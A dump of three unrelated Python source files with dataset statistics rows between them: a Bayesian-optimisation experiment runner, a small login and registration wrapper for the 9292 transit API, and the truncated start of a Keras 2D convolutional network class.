'L':hmc_sampler_config.L,
'burn':hmc_sampler_config.burn,
'Ns':hmc_sampler_config.Ns
}
res = {}
res['hist_argm'] = []
res['hist_argx'] = []
res['hist_yq'] = []
res['hist_y_ground'] = []
res['hist_config'] = []
res['hist_t_fit'] = []
res['hist_t_acq'] = []
res['hist_t_query_m'] = []
res['hist_t_query_h'] = []
pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
logger = open(log_file_name, 'w+')
logger.write('===============================================\n')
logger.write(' Experiment with Parallel HMC \n')
logger.write('===============================================\n')
logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.flush()
exp_t_start = time()
for t in trange(horizon, desc='experiment', leave=True):
t_trial_start = time()
model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
torch.device(mf_nn_surrogate_config.surrogate_placement))
hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
t_fit = time()
pool_argm, pool_argx = hamil_opt.pseudo_par_step(hmc_samples, method_config.n_threads)
t_acq = time()
np_pool_argx = []
np_pool_argm = []
for argm, argx in zip(pool_argm, pool_argx):
np_pool_argx.append(argx.data.cpu().numpy())
np_pool_argm.append(argm.data.cpu().numpy())
#
#pool_yq, pool_y_ground, pool_success = dataset.add_pool(np_pool_argx, np_pool_argm, scaled_input=True)
pool_yq, pool_y_ground, pool_success, pool_config, t_query_m_pool, t_query_h_pool =\
dataset.add_pool_interpret(np_pool_argx, np_pool_argm, scaled_input=True)
#print(pool_config)
t_query = time()
logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
pool_size = len(pool_success)
res['hist_t_fit'].append(t_fit-t_trial_start)
res['hist_t_acq'].append(t_acq-t_fit)
for i in range(pool_size):
success = pool_success[i]
if success:
res['hist_argm'].append(np_pool_argm[i])
res['hist_argx'].append(np_pool_argx[i])
res['hist_yq'].append(pool_yq[i])
res['hist_y_ground'].append(pool_y_ground[i])
res['hist_config'].append(pool_config[i])
res['hist_t_query_m'].append(t_query_m_pool[i])
res['hist_t_query_h'].append(t_query_h_pool[i])
logger.write(' - Success add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
logger.write(' - Success add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
logger.write(' * t_query_m = '+str(t_query_m_pool[i])+' secs\n')
logger.write(' * t_query_h = '+str(t_query_h_pool[i])+' secs\n')
else:
logger.write(' - Failed add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
logger.write(' - Failed add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
#
#
logger.write(' - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
logger.write(' - t_acq = '+str(t_acq-t_fit)+' secs\n')
logger.write(' - t_query = '+str(t_query-t_acq)+' secs\n')
logger.write(' - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
logger.flush()
with open(pickle_name, 'wb') as handle:
pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
#
#
logger.close()
def experiment_batch_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
layers = misc.full_auto_regressive_layers(
dataset.in_dim, dataset.out_dim,
mf_nn_surrogate_config.hidden_depths,
mf_nn_surrogate_config.hidden_widths,
)
sampling = {
'step_size':hmc_sampler_config.step_size,
'L':hmc_sampler_config.L,
'burn':hmc_sampler_config.burn,
'Ns':hmc_sampler_config.Ns
}
res = {}
res['hist_argm'] = []
res['hist_argx'] = []
res['hist_yq'] = []
res['hist_y_ground'] = []
res['hist_config'] = []
res['hist_t_fit'] = []
res['hist_t_acq'] = []
res['hist_t_query_m'] = []
res['hist_t_query_h'] = []
pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
logger = open(log_file_name, 'w+')
logger.write('===============================================\n')
logger.write(' Experiment with Ratio Batch \n')
logger.write('===============================================\n')
logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.flush()
exp_t_start = time()
for t in trange(horizon, desc='experiment', leave=True):
t_trial_start = time()
model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
torch.device(mf_nn_surrogate_config.surrogate_placement))
hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
t_fit = time()
if method_config.batch_mode == 'ratio':
pool_argm, pool_argx, _ = hamil_opt.ratio_batch_step(hmc_samples, method_config.batch_size)
# elif method_config.batch_mode == 'bound_ratio':
# #print('***** New bounded query *****')
# pool_argm, pool_argx, _ = hamil_opt.bound_ratio_batch_step(hmc_samples, method_config.batch_size)
elif method_config.batch_mode == 'linear':
pool_argm, pool_argx, _ = hamil_opt.linear_batch_step(hmc_samples, method_config.batch_size, method_config.beta)
#
t_acq = time()
np_pool_argx = []
np_pool_argm = []
for argm, argx in zip(pool_argm, pool_argx):
np_pool_argx.append(argx.data.cpu().numpy())
np_pool_argm.append(argm.data.cpu().numpy())
#
#pool_yq, pool_y_ground, pool_success = dataset.add_pool(np_pool_argx, np_pool_argm, scaled_input=True)
pool_yq, pool_y_ground, pool_success, pool_config, t_query_m_pool, t_query_h_pool =\
dataset.add_pool_interpret(np_pool_argx, np_pool_argm, scaled_input=True)
t_query = time()
logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
pool_size = len(pool_success)
res['hist_t_fit'].append(t_fit-t_trial_start)
res['hist_t_acq'].append(t_acq-t_fit)
for i in range(pool_size):
success = pool_success[i]
if success:
res['hist_argm'].append(np_pool_argm[i])
res['hist_argx'].append(np_pool_argx[i])
res['hist_yq'].append(pool_yq[i])
res['hist_y_ground'].append(pool_y_ground[i])
res['hist_config'].append(pool_config[i])
res['hist_t_query_m'].append(t_query_m_pool[i])
res['hist_t_query_h'].append(t_query_h_pool[i])
logger.write(' - Success add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
logger.write(' - Success add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
logger.write(' * t_query_m = '+str(t_query_m_pool[i])+' secs\n')
logger.write(' * t_query_h = '+str(t_query_h_pool[i])+' secs\n')
else:
logger.write(' - Failed add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
logger.write(' - Failed add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
#
#
logger.write(' - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
logger.write(' - t_acq = '+str(t_acq-t_fit)+' secs\n')
logger.write(' - t_query = '+str(t_query-t_acq)+' secs\n')
logger.write(' - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
logger.flush()
with open(pickle_name, 'wb') as handle:
pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
#
#
logger.close()
def experiment_ao_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
layers = misc.full_auto_regressive_layers(
dataset.in_dim, dataset.out_dim,
mf_nn_surrogate_config.hidden_depths,
mf_nn_surrogate_config.hidden_widths,
)
sampling = {
'step_size':hmc_sampler_config.step_size,
'L':hmc_sampler_config.L,
'burn':hmc_sampler_config.burn,
'Ns':hmc_sampler_config.Ns
}
res = {}
res['hist_argm'] = []
res['hist_argx'] = []
res['hist_yq'] = []
res['hist_y_ground'] = []
res['hist_config'] = []
res['hist_t_fit'] = []
res['hist_t_acq'] = []
res['hist_t_query_m'] = []
res['hist_t_query_h'] = []
pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
logger = open(log_file_name, 'w+')
logger.write('===============================================\n')
logger.write(' Experiment with AO Batch \n')
logger.write('===============================================\n')
logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.flush()
exp_t_start = time()
for t in trange(horizon, desc='experiment', leave=True):
t_trial_start = time()
model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
torch.device(mf_nn_surrogate_config.surrogate_placement))
hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
t_fit = time()
pool_argm, pool_argx, _ = hamil_opt.ao_ratio_batch_step(hmc_samples, method_config.batch_size, alters=5)
t_acq = time()
np_pool_argx = []
np_pool_argm = []
for argm, argx in zip(pool_argm, pool_argx):
np_pool_argx.append(argx.data.cpu().numpy())
np_pool_argm.append(argm.data.cpu().numpy())
#
#pool_yq, pool_y_ground, pool_success = dataset.add_pool(np_pool_argx, np_pool_argm, scaled_input=True)
pool_yq, pool_y_ground, pool_success, pool_config, t_query_m_pool, t_query_h_pool =\
dataset.add_pool_interpret(np_pool_argx, np_pool_argm, scaled_input=True)
t_query = time()
logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
pool_size = len(pool_success)
res['hist_t_fit'].append(t_fit-t_trial_start)
res['hist_t_acq'].append(t_acq-t_fit)
for i in range(pool_size):
success = pool_success[i]
if success:
res['hist_argm'].append(np_pool_argm[i])
res['hist_argx'].append(np_pool_argx[i])
res['hist_yq'].append(pool_yq[i])
res['hist_y_ground'].append(pool_y_ground[i])
res['hist_config'].append(pool_config[i])
res['hist_t_query_m'].append(t_query_m_pool[i])
res['hist_t_query_h'].append(t_query_h_pool[i])
logger.write(' - Success add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
logger.write(' - Success add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
logger.write(' * t_query_m = '+str(t_query_m_pool[i])+' secs\n')
logger.write(' * t_query_h = '+str(t_query_h_pool[i])+' secs\n')
else:
logger.write(' - Failed add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
logger.write(' - Failed add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
#
#
logger.write(' - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
logger.write(' - t_acq = '+str(t_acq-t_fit)+' secs\n')
logger.write(' - t_query = '+str(t_query-t_acq)+' secs\n')
logger.write(' - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
logger.flush()
with open(pickle_name, 'wb') as handle:
pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
#
#
logger.close()
def experiment_mf_mes(domain_name, horizon, num_trials, num_inits, init_i_trial, penalty):
Ninit="".join([str(e)+',' for e in num_inits])[:-1]
costs = "".join([str(e)+',' for e in penalty])[:-1]
os.chdir('baselines/MF-MES/experiments')
subprocess.run(["python", "customized_bo_runner.py", "-m", "MFMES_RFM", "-d", domain_name, "-t", str(horizon),
"-c", "2000000", "-i", Ninit, "-s", costs, "-T", str(num_trials), "-f", str(init_i_trial)])
os.chdir('../../')
def experiment_par_mf_mes(domain_name, horizon, num_trials, num_inits, init_i_trial, penalty):
Ninit="".join([str(e)+',' for e in num_inits])[:-1]
costs = "".join([str(e)+',' for e in penalty])[:-1]
os.chdir('baselines/MF-MES/experiments')
subprocess.run(["python", "customized_parallel_bayesopt_exp.py", "-m", "Parallel_MFMES_RFM", "-d", domain_name, "-t", str(horizon),
"-c", "2000000", "-i", Ninit, "-s", costs, "-T", str(num_trials), "-f", str(init_i_trial)])
os.chdir('../../')
def experiment_mf_gp_ucb(domain_name, horizon, num_trials, num_inits, init_i_trial, penalty):
Ninit="".join([str(e)+',' for e in num_inits])[:-1]
costs = "".join([str(e)+',' for e in penalty])[:-1]
os.chdir('baselines/MF-MES/experiments')
subprocess.run(["python", "customized_bo_runner.py", "-m", "BOCA", "-d", domain_name, "-t", str(horizon),
"-f", str(init_i_trial),
"-c", "2000000", "-i", Ninit, "-s", costs, "-T", str(num_trials), "-f", str(init_i_trial)])
os.chdir('../../')
def experiment_smac(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
for t in range(num_trials):
trial = t + init_i_trial
res_path = os.path.join('results', domain_name, 'smac', 'trial'+str(trial))
try:
if not os.path.exists(res_path):
os.makedirs(res_path, exist_ok=True)
#
print("Directory '%s' created successfully" % (res_path))
except OSError as error:
print("Directory '%s' can not be created" % (res_path))
#
client = SMAC3.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
client.minimize()
def experiment_gp_kernel(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
for t in range(num_trials):
trial = t + init_i_trial
res_path = os.path.join('results', domain_name, 'gp_kernel', 'trial'+str(trial))
try:
if not os.path.exists(res_path):
os.makedirs(res_path, exist_ok=True)
#
print("Directory '%s' created successfully" % (res_path))
except OSError as error:
print("Directory '%s' can not be created" % (res_path))
#
client = SMAC4.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
client.minimize()
def experiment_hyperband(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
for t in range(num_trials):
trial = t + init_i_trial
res_path = os.path.join('results', domain_name, 'hyperband', 'trial'+str(trial))
try:
if not os.path.exists(res_path):
os.makedirs(res_path, exist_ok=True)
#
print("Directory '%s' created successfully" % (res_path))
except OSError as error:
print("Directory '%s' can not be created" % (res_path))
#
client = Hyperband.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
client.minimize()
def experiment_bohb(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
for t in range(num_trials):
trial = t + init_i_trial
res_path = os.path.join('results', domain_name, 'bohb', 'trial'+str(trial))
try:
if not os.path.exists(res_path):
os.makedirs(res_path, exist_ok=True)
#
print("Directory '%s' created successfully" % (res_path))
except OSError as error:
print("Directory '%s' can not be created" % (res_path))
#
client = BOHB.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
client.minimize()
def experiment_multitask_bo(dataset, method_config, horizon, res_path, trial_id):
res = {}
res['hist_argm'] = []
res['hist_argx'] = []
res['hist_yq'] = []
res['hist_y_ground'] = []
res['hist_config'] = []
res['hist_t_fit'] = []
res['hist_t_acq'] = []
res['hist_t_query_m'] = []
res['hist_t_query_h'] = []
pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
logger = open(log_file_name, 'w+')
logger.write('===============================================\n')
logger.write(' Experiment with Multitask BO \n')
logger.write('===============================================\n')
logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.flush()
base_dim = method_config.base_dim
base_hidden_depth = method_config.base_hidden_depth
base_hidden_width = method_config.base_hidden_width
surrogate_device = torch.device(method_config.surrogate_placement)
exp_t_start = time()
for t in trange(horizon, desc='experiment', leave=True):
t_trial_start = time()
hpo = SHPO.HPO(dataset, base_dim, base_hidden_depth, base_hidden_width, surrogate_device)
t_fit = time()
np_argm, np_argx = hpo.step(dataset.penalty)
t_acq = time()
#yq, y_ground, success = dataset.add(np_argx, np_argm, scaled_input=True)
yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=False)
t_query = time()
if success:
res['hist_argm'].append(np_argm)
res['hist_argx'].append(np_argx)
res['hist_yq'].append(yq)
res['hist_y_ground'].append(y_ground)
res['hist_config'].append(config)
res['hist_t_fit'].append(t_fit-t_trial_start)
res['hist_t_acq'].append(t_acq-t_fit)
res['hist_t_query_m'].append(t_query_m)
res['hist_t_query_h'].append(t_query_h)
logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.write(' - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
logger.write(' - t_acq = '+str(t_acq-t_fit)+' secs\n')
logger.write(' - t_query_m = '+str(t_query_m)+' secs\n')
logger.write(' - t_query_h = '+str(t_query_h)+' secs\n')
logger.write(' - t_query = '+str(t_query-t_acq)+' secs\n')
logger.write(' - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
logger.flush()
else:
logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
logger.write(' - argm = '+str(np_argm)+'\n')
logger.write(' - argx = '+np.array2string(np_argx)+'\n')
logger.flush()
with open(pickle_name, 'wb') as handle:
pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
#
#
logger.close()
def experiment_gp_ts(domain_name):
os.chdir('baselines/gp-parallel-ts')
# print('run_gp_tes')
runner_name = 'run_gpts_'+domain_name+'.py'
# print(runner_name)
# if domain_name == 'Diabetes':
subprocess.run(["python", runner_name])
#
os.chdir('../../')
def evaluation(**kwargs):
configs = parse_exp_configs(kwargs)
domain_name = configs['domain_config'].domain_name
domain_penalty = configs['domain_config'].penalty
domain_placement = configs['domain_config'].domain_placement
domain_Ninits = configs['domain_config'].num_inits
preload = os.path.join('data','preload',domain_name+'.pickle')
mf_func = functions.MfFunc(domain_name, domain_penalty, torch.device(domain_placement))
#dataset = Dataset.MfData(mf_func, preload)
if configs['opt_config'].algorithm_name in MF_DNN_APPROACH:
init_i_trial = configs['opt_config'].init_i_trial
for t in range(configs['opt_config'].num_trials):
dataset = Dataset.MfData(mf_func, preload)
tid = t + init_i_trial
res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'trial'+str(tid))
create_path(res_path)
experiment_mf_dnn(
dataset,
configs['method_config'],
configs['mf_nn_surrogate_config'],
configs['hmc_config'],
configs['opt_config'].horizon,
res_path,
tid,
)
#
elif configs['opt_config'].algorithm_name in SINGLE_BASED_APPROACH:
init_i_trial = configs['opt_config'].init_i_trial
for t in range(configs['opt_config'].num_trials):
dataset = Dataset.MfData(mf_func, preload)
tid = t + init_i_trial
res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'trial'+str(tid))
create_path(res_path)
experiment_single_hmc(
dataset,
configs['method_config'],
configs['mf_nn_surrogate_config'],
configs['hmc_config'],
configs['opt_config'].horizon,
res_path,
tid,
)
#
elif configs['opt_config'].algorithm_name in RANDOM_APPROACH:
init_i_trial = configs['opt_config'].init_i_trial
for t in range(configs['opt_config'].num_trials):
dataset = Dataset.MfData(mf_func, preload)
tid = t + init_i_trial
res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'trial'+str(tid))
create_path(res_path)
experiment_random(
dataset,
configs['method_config'],
configs['mf_nn_surrogate_config'],
configs['hmc_config'],
configs['opt_config'].horizon,
res_path,
tid,
)
#
elif configs['opt_config'].algorithm_name in PAR_HMC_BASED_APPROACH:
init_i_trial = configs['opt_config'].init_i_trial
for t in range(configs['opt_config'].num_trials):
dataset = Dataset.MfData(mf_func, preload)
tid = t + init_i_trial
res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'trial'+str(tid))
create_path(res_path)
experiment_par_hmc(
dataset,
configs['method_config'],
configs['mf_nn_surrogate_config'],
configs['hmc_config'],
configs['opt_config'].horizon,
res_path,
tid,
)
#
elif configs['opt_config'].algorithm_name in BATCH_HMC_BASED_APPROACH:
init_i_trial = configs['opt_config'].init_i_trial
# if configs['method_config'].batch_mode=='linear':
# beta = configs['method_config'].beta
# res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name+'_'+str(beta), 'init'+str(init_i_trial))
# elif configs['method_config'].batch_mode=='ratio':
# res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'init'+str(init_i_trial))
# else:
# raise Exception('Error: invalid batch mode')
# #
# try:
# if not os.path.exists(res_path):
# os.makedirs(res_path, exist_ok=True)
# #
# print("Directory '%s' created successfully" % (res_path))
# except OSError as error:
# print("Directory '%s' can not be created" % (res_path))
# #
for t in range(configs['opt_config'].num_trials):
dataset = Dataset.MfData(mf_func, preload)
tid = t + init_i_trial
res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'trial'+str(tid))
create_path(res_path)
experiment_batch_hmc(
dataset,
configs['method_config'],
configs['mf_nn_surrogate_config'],
configs['hmc_config'],
configs['opt_config'].horizon,
res_path,
tid,
)
#
elif configs['opt_config'].algorithm_name in AO_HMC_BASED_APPROACH:
init_i_trial = configs['opt_config'].init_i_trial
for t in range(configs['opt_config'].num_trials):
dataset = Dataset.MfData(mf_func, preload)
tid = t + init_i_trial
res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'trial'+str(tid))
create_path(res_path)
experiment_ao_hmc(
dataset,
configs['method_config'],
configs['mf_nn_surrogate_config'],
configs['hmc_config'],
configs['opt_config'].horizon,
res_path,
tid,
)
#
elif configs['opt_config'].algorithm_name == 'mf_gp_ucb':
experiment_mf_gp_ucb(
domain_name,
configs['opt_config'].horizon,
configs['opt_config'].num_trials,
domain_Ninits,
configs['opt_config'].init_i_trial,
domain_penalty
)
elif configs['opt_config'].algorithm_name == 'mf_mes':
experiment_mf_mes(
domain_name,
configs['opt_config'].horizon,
configs['opt_config'].num_trials,
domain_Ninits,
configs['opt_config'].init_i_trial,
domain_penalty
)
elif configs['opt_config'].algorithm_name == 'par_mf_mes':
#print('********** New implemnted par mfmes **********')
experiment_par_mf_mes(
domain_name,
configs['opt_config'].horizon,
configs['opt_config'].num_trials,
domain_Ninits,
configs['opt_config'].init_i_trial,
domain_penalty
)
elif configs['opt_config'].algorithm_name == 'smac':
experiment_smac(
domain_name,
configs['opt_config'].horizon,
configs['opt_config'].num_trials,
configs['opt_config'].init_i_trial,
domain_penalty,
domain_placement
)
elif configs['opt_config'].algorithm_name == 'gp_kernel':
experiment_gp_kernel(
domain_name,
configs['opt_config'].horizon,
configs['opt_config'].num_trials,
configs['opt_config'].init_i_trial,
domain_penalty,
domain_placement
)
elif configs['opt_config'].algorithm_name == 'hyperband':
experiment_hyperband(
domain_name,
configs['opt_config'].horizon,
configs['opt_config'].num_trials,
configs['opt_config'].init_i_trial,
domain_penalty,
domain_placement
)
elif configs['opt_config'].algorithm_name == 'bohb':
experiment_bohb(
domain_name,
configs['opt_config'].horizon,
configs['opt_config'].num_trials,
configs['opt_config'].init_i_trial,
domain_penalty,
domain_placement
)
elif configs['opt_config'].algorithm_name in MT_APPROACH:
init_i_trial = configs['opt_config'].init_i_trial
for t in range(configs['opt_config'].num_trials):
dataset = Dataset.MfData(mf_func, preload)
tid = t + init_i_trial
res_path = os.path.join('results', domain_name, configs['opt_config'].algorithm_name, 'trial'+str(tid))
create_path(res_path)
experiment_multitask_bo(
dataset,
configs['method_config'],
configs['opt_config'].horizon,
res_path,
tid,
)
#
elif configs['opt_config'].algorithm_name == 'gp_ts':
experiment_gp_ts(
domain_name
)
if __name__=='__main__':
fire.Fire(evaluation)
| 39.689655
| 139
| 0.584564
| 6,101
| 48,342
| 4.295853
| 0.043763
| 0.033653
| 0.038918
| 0.044946
| 0.888779
| 0.868442
| 0.854554
| 0.851311
| 0.846198
| 0.837651
| 0
| 0.002179
| 0.269
| 48,342
| 1,218
| 140
| 39.689655
| 0.739487
| 0.051963
| 0
| 0.780854
| 0
| 0
| 0.164122
| 0.023034
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020761
| false
| 0
| 0.019608
| 0
| 0.041522
| 0.011534
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03e9e7917f807ecb943ed9570e4ec3d29a833ac0
| 1,528
|
py
|
Python
|
negentweeapi/accounts.py
|
PythonWrappers/9292API
|
50034c9ebc0bf51d8b06bb9d44267c7c602418f1
|
[
"Apache-2.0"
] | null | null | null |
negentweeapi/accounts.py
|
PythonWrappers/9292API
|
50034c9ebc0bf51d8b06bb9d44267c7c602418f1
|
[
"Apache-2.0"
] | null | null | null |
negentweeapi/accounts.py
|
PythonWrappers/9292API
|
50034c9ebc0bf51d8b06bb9d44267c7c602418f1
|
[
"Apache-2.0"
] | null | null | null |
from .settings import *
import requests
import json
def login(username: str, password: str) -> dict:
"""
Tries to login to the 9292 API. Some function that available need a sessionID. This is because they are user
specific.
:param username: A string that contains the email account of a specific user
:param password: A string that contains the password of the given email account
:return: An dict which can contain two different keys:
{ 'error' : 'An error' },
{ 'sessionID' : 'An sessionID'}
"""
url = "{0}/{1}/accounts/login?lang={2}".format(URL, APIVERSION, LANG)
data = {
"email": username,
"password": password
}
return requests.post(url=url, data=json.dumps(data)).json()
def register(username: str, password: str) -> dict:
"""
Tries to create a 9292 account through the API. Some function that available need a sessionID. This is because
they are user specific.
:param username: A string that contains the email account of a specific user
:param password: A string that contains the password of the given email account
:return: An dict which can contain two different keys:
{ 'error' : 'An error' },
{ 'sessionID' : 'An sessionID'}
"""
url = "{0}/{1}/accounts/register?lang={2}".format(URL, APIVERSION, LANG)
data = {
"email": username,
"password": password
}
return requests.post(url=url, data=json.dumps(data)).json()
| 38.2
| 118
| 0.636126
| 199
| 1,528
| 4.884422
| 0.301508
| 0.028807
| 0.045267
| 0.078189
| 0.880658
| 0.880658
| 0.880658
| 0.812757
| 0.812757
| 0.812757
| 0
| 0.012346
| 0.257853
| 1,528
| 39
| 119
| 39.179487
| 0.844797
| 0.539921
| 0
| 0.470588
| 0
| 0
| 0.152685
| 0.10906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0.235294
| 0.176471
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2081bf4c3e2e22742564fd322a90e5c7cbf4a178
| 17,095
|
py
|
Python
|
ku/applications_ext/nobody_convnet2d.py
|
tonandr/keras_unsupervised
|
fd2a2494bca2eb745027178e220b42b5e5882f94
|
[
"BSD-3-Clause"
] | 4
|
2019-07-28T11:56:01.000Z
|
2021-11-06T02:50:58.000Z
|
ku/applications_ext/nobody_convnet2d.py
|
tonandr/keras_unsupervised
|
fd2a2494bca2eb745027178e220b42b5e5882f94
|
[
"BSD-3-Clause"
] | 2
|
2021-06-30T01:00:07.000Z
|
2021-07-21T08:04:40.000Z
|
ku/applications_ext/nobody_convnet2d.py
|
tonandr/keras_unsupervised
|
fd2a2494bca2eb745027178e220b42b5e5882f94
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Created on Sep 15, 2020
@author: Inwoo Chung (gutomitai@gmail.com)
'''
import numpy as np
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import DepthwiseConv2D, SeparableConv2D, BatchNormalization, GlobalAveragePooling2D
from tensorflow.keras.layers import Activation, Reshape, Add, Multiply, Dropout, UpSampling2D
from tensorflow.keras import initializers
from tensorflow.keras import regularizers
# Constants.
DEBUG = True
class NobodyConvNet2D(Model):
"""2D convolution network model."""
def __init__(self, conf, input_shape):
"""
Parameters
----------
conf: Dictionary
Configuration dictionary.
"""
# Initialize.
self.conf = conf
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
self.model_loading = self.conf['model_loading']
self.cell_sizes = [int(self.nn_arch['cell_size'] * 2 ** i) for i in range(self.nn_arch['anchor_scale_size'])]
self.cell_image_sizes = [int(self.nn_arch['image_size'] / self.cell_sizes[i]) \
for i in range(self.nn_arch['anchor_scale_size'])]
super(NobodyConvNet2D, self).__init__()
# Design layers.
# Start stem.
nc = int(input_shape[-1] * 4)
rate = (1, 1)
self.sep_conv2d_1 = SeparableConv2D(nc
, kernel_size=3
, strides=2
, depth_multiplier=1
, dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier']
, rate[1] * self.nn_arch['conv_rate_multiplier'])
, padding='same'
, use_bias=False
, kernel_initializer=initializers.TruncatedNormal())
self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'], scale=self.hps['bn_scale'])
self.act_1 = Activation('relu')
# Sequence1.
rate = (1, 1)
self.block1_seq1 = Block1(conf, rate, nc)
nc = int(nc * 2)
# Sequence2.
rate = (1, 1)
self.block2_seq2 = Block2(conf, rate, nc)
# Sequence3.
rate = (1, 1)
#self.block1_seq3 = Block1(conf, rate, nc)
#nc = int(nc * 2)
rate = (1, 1)
self.block2_seq3 = Block2(conf, rate, nc)
# Sequence4.
rate = (1, 1)
#self.block1_seq4 = Block1(conf, rate, nc)
#nc = int(nc * 2)
rate = (1, 1)
self.block2_seq4 = Block2(conf, rate, nc)
# Sequence5.
rate = (1, 1)
self.block1_seq5 = Block1(conf, rate, nc)
nc = int(nc * 2)
rate = (1, 1)
self.block2_seq5 = Block2(conf, rate, nc)
self.block2_seq5_2 = Block2(conf, rate, nc)
# Sequence6.
rate = (1, 1)
self.block1_seq6 = Block1(conf, rate, nc)
nc = int(nc * 2)
rate = (1, 1)
self.block2_seq6 = Block2(conf, rate, nc)
self.block2_seq6_2 = Block2(conf, rate, nc)
# Final stem 1.
self.module5 = Module5(conf, self.nn_arch['sp_feature_dim'])
def call(self, input_tensor):
x = self.sep_conv2d_1(input_tensor)
x = self.bn_1(x)
x = self.act_1(x)
x = self.block1_seq1(x)
x = self.block2_seq2(x)
#x = self.block1_seq3(x)
